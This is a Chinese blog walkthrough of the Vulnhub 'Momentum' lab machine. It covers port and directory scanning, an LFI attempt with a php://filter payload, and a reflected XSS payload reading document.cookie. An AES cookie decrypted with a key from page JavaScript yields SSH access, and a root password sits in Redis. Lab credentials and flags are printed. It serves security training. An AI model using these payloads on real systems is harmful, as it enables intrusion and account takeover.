首页 > 其他分享 >Vulnhub之Momentum靶机测试过程

Vulnhub之Momentum靶机测试过程

时间:2022-12-28 11:24:09浏览次数:36  
标签:Status http 192.168 Vulnhub 56.137 txt 靶机 Momentum Size

Momentum

识别目标主机IP地址

─(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                           
                                                                                                                         
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                         
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:11      1      60  Unknown vendor                                                        
 192.168.56.100  08:00:27:75:2a:10      1      60  PCS Systemtechnik GmbH                                                
 192.168.56.137  08:00:27:80:8e:c9      1      60  PCS Systemtechnik GmbH                                                


利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.137

NMAP扫描

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.137 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-27 21:15 EST
Nmap scan report for bogon (192.168.56.137)
Host is up (0.00014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5c:8e:2c:cc:c1:b0:3e:7c:0e:22:34:d8:60:31:4e:62 (RSA)
|   256 81:fd:c6:4c:5a:50:0a:27:ea:83:38:64:b9:8b:bd:c1 (ECDSA)
|_  256 c1:8f:87:c1:52:09:27:60:5f:2e:2d:e0:08:03:72:c8 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Momentum | Index 
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:80:8E:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.76 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)

获得Shell

接下来的信息收集主要围绕着80端口展开,浏览器访问该端口,页面中有4张图片,将他们下载到Kali Linux本地:

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ls
a.jpg  b.jpg  c.jpg  d.jpg  nmap_full_scan
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ls
a.jpg  b.jpg  c.jpg  d.jpg  nmap_full_scan
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ exiftool a.jpg        
ExifTool Version Number         : 12.44
File Name                       : a.jpg
Directory                       : .
File Size                       : 501 kB
File Modification Date/Time     : 2022:12:27 21:18:06-05:00
File Access Date/Time           : 2022:12:27 21:18:06-05:00
File Inode Change Date/Time     : 2022:12:27 21:18:06-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:4:4 (1 1)
Image Size                      : 1920x1080
Megapixels                      : 2.1
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ steghide extract -sf a.jpg        
Enter passphrase: 
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ stegseek a.jpg            
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Progress: 99.85% (133.2 MB)           
[!] error: Could not find a valid passphrase.
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ binwalk -e a.jpg        

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01


有理由相信从4张图片不能提取更多信息了。

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ curl http://192.168.56.137/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.137 Port 80</address>
</body></html>

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ nikto -h http://192.168.56.137
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.137
+ Target Hostname:    192.168.56.137
+ Target Port:        80
+ Start Time:         2022-12-27 21:22:04 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 7d1, size: 5c086352f5b80, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2022-12-27 21:23:12 (GMT-5) (68 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? n

                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/12/27 21:23:46 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/server-status        (Status: 403) [Size: 279]
Progress: 218055 / 220561 (98.86%)===============================================================
2022/12/27 21:24:23 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:26:08 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 2001]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1323086 / 1323366 (99.98%)===============================================================
2022/12/27 21:30:25 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt -x .php,.html,.sh,.js,.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:31:32 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html           (Status: 200) [Size: 2001]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
Progress: 848352 / 850254 (99.78%)===============================================================
2022/12/27 21:34:17 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.sh,.js,.txt
Completing file
AdobeCQ-AEM.txt                               local-ports.txt                             
AdobeXML.fuzz.txt                             Logins.fuzz.txt                             
aem2.txt                                      LotusNotes.fuzz.txt                         
Apache.fuzz.txt                               netware.txt                                 
ApacheTomcat.fuzz.txt                         nginx.txt                                   
apache.txt                                    oauth-oidc-scopes.txt                       
api/                                          Oracle9i.fuzz.txt                           
axis.txt                                      OracleAppServer.fuzz.txt                    
big.txt                                       Oracle-EBS-wordlist.txt                     
burp-parameter-names.txt                      oracle.txt                                  
BurpSuite-ParamMiner/                         Passwords.fuzz.txt                          
CGI-HTTP-POST.fuzz.txt                        PHP.fuzz.txt                                
CGI-HTTP-POST-Windows.fuzz.txt                proxy-conf.fuzz.txt                         
CGI-Microsoft.fuzz.txt                        Public-Source-Repo-Issues.json              
CGIs.txt                                      quickhits.txt                               
CGI-XPlatform.fuzz.txt                        raft-large-directories-lowercase.txt        
CMS/                                          raft-large-directories.txt                  
coldfusion.txt                                raft-large-extensions-lowercase.txt         
combined_directories.txt                      raft-large-extensions.txt                   
combined_words.txt                            raft-large-files-lowercase.txt              
common-and-dutch.txt                          raft-large-files.txt                        
common-and-french.txt                         raft-large-words-lowercase.txt              
common-and-italian.txt                        raft-large-words.txt                        
common-and-portuguese.txt                     raft-medium-directories-lowercase.txt       
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x .php,.html,.sh,.js,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:34:44 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess.js         (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess.sh         (Status: 403) [Size: 279]
/.htpasswd.js         (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd.sh         (Status: 403) [Size: 279]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html           (Status: 200) [Size: 2001]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status        (Status: 403) [Size: 279]
Progress: 120416 / 122862 (98.01%)===============================================================
2022/12/27 21:35:05 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/ -x .php,.html,.sh,.js,.txt 
Completing file
AdobeCQ-AEM.txt                               local-ports.txt                             
AdobeXML.fuzz.txt                             Logins.fuzz.txt                             
aem2.txt                                      LotusNotes.fuzz.txt                         
Apache.fuzz.txt                               netware.txt                                 
ApacheTomcat.fuzz.txt                         nginx.txt                                   
apache.txt                                    oauth-oidc-scopes.txt                       
api/                                          Oracle9i.fuzz.txt                           
axis.txt                                      OracleAppServer.fuzz.txt                    
big.txt                                       Oracle-EBS-wordlist.txt                     
burp-parameter-names.txt                      oracle.txt                                  
BurpSuite-ParamMiner/                         Passwords.fuzz.txt                          
CGI-HTTP-POST.fuzz.txt                        PHP.fuzz.txt                                
CGI-HTTP-POST-Windows.fuzz.txt                proxy-conf.fuzz.txt                         
CGI-Microsoft.fuzz.txt                        Public-Source-Repo-Issues.json              
CGIs.txt                                      quickhits.txt                               
CGI-XPlatform.fuzz.txt                        raft-large-directories-lowercase.txt        
CMS/                                          raft-large-directories.txt                  
coldfusion.txt                                raft-large-extensions-lowercase.txt         
combined_directories.txt                      raft-large-extensions.txt                   
combined_words.txt                            raft-large-files-lowercase.txt              
common-and-dutch.txt                          raft-large-files.txt                        
common-and-french.txt                         raft-large-words-lowercase.txt              
common-and-italian.txt                        raft-large-words.txt                        
common-and-portuguese.txt                     raft-medium-directories-lowercase.txt       
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x .php,.html,.sh,.js,.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:35:35 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html           (Status: 200) [Size: 2001]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status        (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 135449 / 373710 (36.24%)[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:57 [!] parse "http://192.168.56.137/besalu\t.txt": net/url: invalid control character in URL
Progress: 143081 / 373710 (38.29%)[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:35:59 [!] parse "http://192.168.56.137/error\x1f_log.txt": net/url: invalid control character in URL
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 2001]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
Progress: 372828 / 373710 (99.76%)===============================================================
2022/12/27 21:36:46 Finished
===============================================================
                                                                                                                          
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ gobuster dir -u http://192.168.56.137 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x .php,.html,.sh,.js,.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              php,html,sh,js,txt
[+] Timeout:                 10s
===============================================================
2022/12/27 21:37:06 Starting gobuster in directory enumeration mode
===============================================================
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.137/js/]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.137/css/]
/img                  (Status: 301) [Size: 314] [--> http://192.168.56.137/img/]
/index.html           (Status: 200) [Size: 2001]
/manual               (Status: 301) [Size: 317] [--> http://192.168.56.137/manual/]
/server-status        (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 134643 / 180006 (74.80%)[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.sh": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:39 [!] parse "http://192.168.56.137/besalu\t.txt": net/url: invalid control character in URL
Progress: 143139 / 180006 (79.52%)[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.js": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.txt": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/27 21:37:41 [!] parse "http://192.168.56.137/error\x1f_log.sh": net/url: invalid control character in URL
Progress: 179448 / 180006 (99.69%)===============================================================
2022/12/27 21:37:49 Finished
===============================================================
                                                                   

至此没有扫描到任何有价值的目录或者文件,回过头来看首页,点开图片,注意以下url:

http://192.168.56.137/opus-details.php?id=visor

会不会有文件包含漏洞?

但是访问

http://192.168.56.137/opus-details.php?id=../../../../../../etc/passwd

只返回字符串/etc/passwd文本,因此可能有过滤机制

尝试php filter bypass:

http://192.168.56.137/opus-details.php?id=php://filter/convert.base64-encode/resource=opus-details

但是仍然没有返回

┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ curl http://192.168.56.137/js/main.js
function viewDetails(str) {

  window.location.href = "opus-details.php?id="+str;
}

/*
var CryptoJS = require("crypto-js");
var decrypted = CryptoJS.AES.decrypt(encrypted, "SecretPassphraseMomentum");
console.log(decrypted.toString(CryptoJS.enc.Utf8));
*/

在网页浏览中我们常常涉及到用户登录,登录完毕之后服务端会返回一个cookie值。这个cookie值相当于一个令牌,拿着这张令牌就等同于证明了你是某个用户。
如果你的cookie值被窃取,那么攻击者很可能能够直接利用你的这张令牌不用密码就登录你的账户。如果想要通过script脚本获得当前页面的cookie值,通常会用到document.cookie。

构造url获取cookie值:

http://192.168.56.137/opus-details.php?id=%3Cscript%3Ealert(document.cookie);%3C/script%3E

从而获得cookie值:

cookie=U2FsdGVkX193yTOKOucUbHeDp1Wxd5r7YkoM8daRtj0rjABqGuQ6Mx28N1VbBSZt

而从js文件知道该值是经过AES加密,并且密码是: SecretPassphraseMomentum

用AES 在线网站解密:

auxerre-alienum##
┌──(kali㉿kali)-[~/Vulnhub/Momentum]
└─$ ssh [email protected]
The authenticity of host '192.168.56.137 (192.168.56.137)' can't be established.
ED25519 key fingerprint is SHA256:NLUFYImFHvyED76cAzjnxD3dTxP5rzmEHrx4acGvM9c.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.137' (ED25519) to the list of known hosts.
[email protected]'s password: 
Linux Momentum 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 08:47:31 2021
auxerre@Momentum:~$ id
uid=1000(auxerre) gid=1000(auxerre) groups=1000(auxerre),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
auxerre@Momentum:~$ sudo -l
-bash: sudo: command not found
auxerre@Momentum:~$ ls -alh
total 28K
drwxr-xr-x 3 auxerre auxerre 4.0K Apr 22  2021 .
drwxr-xr-x 3 root    root    4.0K Apr 19  2021 ..
-rw------- 1 auxerre auxerre    0 Apr 22  2021 .bash_history
-rw-r--r-- 1 auxerre auxerre  220 Apr 19  2021 .bash_logout
-rw-r--r-- 1 auxerre auxerre 3.5K Apr 19  2021 .bashrc
-rw-r--r-- 1 auxerre auxerre  807 Apr 19  2021 .profile
drwx------ 2 auxerre auxerre 4.0K Apr 21  2021 .ssh
-rwx------ 1 auxerre auxerre  146 Apr 22  2021 user.txt
auxerre@Momentum:~$ cat user.txt
[ Momentum - User Owned ]
---------------------------------------
flag : 84157165c30ad34d18945b647ec7f647
---------------------------------------
auxerre@Momentum:~$ cat .bash_history 

提权

上传linpeas.sh脚本到目标主机/tmp目录,修改权限,并执行脚本,从输出结果得知目标主机运行6379即redis

╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports                                                  
tcp     LISTEN   0        128            127.0.0.1:6379          0.0.0.0:*                                                
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      
tcp     LISTEN   0        128                [::1]:6379             [::]:*      
tcp     LISTEN   0        128                    *:80                  *:*      
tcp     LISTEN   0        128                 [::]:22               [::]:*      

auxerre@Momentum:/tmp$ redis-cli
127.0.0.1:6379> keys *
1) "rootpass"
127.0.0.1:6379> get rootpass
"m0mentum-al1enum##"
127.0.0.1:6379> exit
auxerre@Momentum:/tmp$ su - root
Password: 
root@Momentum:~# cd /root
root@Momentum:~# ls -alh
total 24K
drwx------  3 root root 4.0K Apr 22  2021 .
drwxr-xr-x 18 root root 4.0K Apr 19  2021 ..
-rw-------  1 root root    0 Apr 22  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Apr 21  2021 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rwx------  1 root root  162 Apr 22  2021 root.txt
root@Momentum:~# cat root.txt
[ Momentum - Rooted ]
---------------------------------------
Flag : 658ff660fdac0b079ea78238e5996e40
---------------------------------------
by alienum with <3

root@Momentum:~# 

经验教训

  1. 在看到url的特点,认为有本地文件包含漏洞时,但是经过尝试,包括使用Php filter函数都没有能够得到相应的结果,此时测试过程中应当注意返回的结果:并不是不存在,或者为空,因此这里面必有奥妙存在,然后查看js代码,发现是js代码在执行.

标签:Status,http,192.168,Vulnhub,56.137,txt,靶机,Momentum,Size
From: https://www.cnblogs.com/jason-huawen/p/17009703.html

相关文章

  • vulnhub-Stapler
    kali:192.168.56.109靶机:192.168.56.121nmap-sS-sV-O-T5-p-192.168.56.121Nmapscanreportfor192.168.56.121Hostisup(0.0020slatency).Notshown:65523......
  • vulnhub靶场之HACKABLE: III
    准备:攻击机:虚拟机kali、本机win10。靶机:Hackable:III,下载地址:https://download.vulnhub.com/hackable/hackable3.ova,下载后直接vbox打开即可。知识点:lxd提权、hydra爆......
  • Vulnhub之My CMSCMS靶机详细测试过程(采用不同的拿web shell的方法)
    MyCMSCMS作者:Jason_huawen靶机基本信息名称:MyCMSMS:1地址:识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/MyCMSCMS]└─$sudonetdiscover-ieth1Currentl......
  • vulnhub靶场之GROTESQUE: 3.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:Grotesque:3.0.1,下载地址:https://download.vulnhub.com/grotesque/grotesque3.zip,下载后直接vbox打开即可。知识点:ffuf参数爆破......
  • vulnhub-Tr0ll2
     Tr0ll:2~VulnHubwww.vulnhub.com/entry/tr0ll-2,107/kali192.168.56.109靶机192.168.56.120nmap-sS-A-O-p-192.168.56.120Nmapscanreportfor192.168......
  • vulnhub-LordOfTheRoot
    https://www.vulnhub.com/entry/lord-of-the-root-101,129/本机10.0.2.4靶机10.0.2.15靶机是桌面版ubuntu,提示了登录用户名smeagolnamp扫描,发现只有22端口开放。使......
  • vulnhub-IMF
    www.vulnhub.com/entry/imf-1,162/kali 192.168.10.7靶机192.168.10.10nmap-sV-A-O-p-192.168.10.10Nmapscanreportfor192.168.10.10Hostisup(0.0020......
  • vulnhub靶场,Me-and-My-Girlfriend-1
    靶场地址和背景:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/Description:ThisVMtellsusthatthereareacoupleofloversnamelyAliceandBob,......
  • vulnhub-DerpNStink
    DerpNStink:1~VulnHub www.vulnhub.com/entry/derpnstink-1,221/修改hosts文件,使IP绑定到derpnstink.localkaliip:192.168.56.109主机扫描主机发现nmap-sn......
  • Vulnhub之ReconForce靶机详细测试过程
    ReconForce作者:jason_huawen靶机基本信息名称:ReconForce(v1.1)地址:https://www.vulnhub.com/entry/hacknos-reconforce-v11,416/识别目标主机IP地址──(kali㉿ka......